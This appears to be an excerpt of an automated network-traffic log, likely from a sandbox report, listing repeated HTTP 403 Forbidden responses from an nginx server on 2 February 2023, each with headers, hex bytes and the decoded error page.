            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:51 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:51 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:52 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:52 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:53 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:55 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:56 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:56 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:57 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:58 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:59 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:59 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:00 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:02 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:02 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:03 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:03 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:04 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:04 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:05 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:05 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:06 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
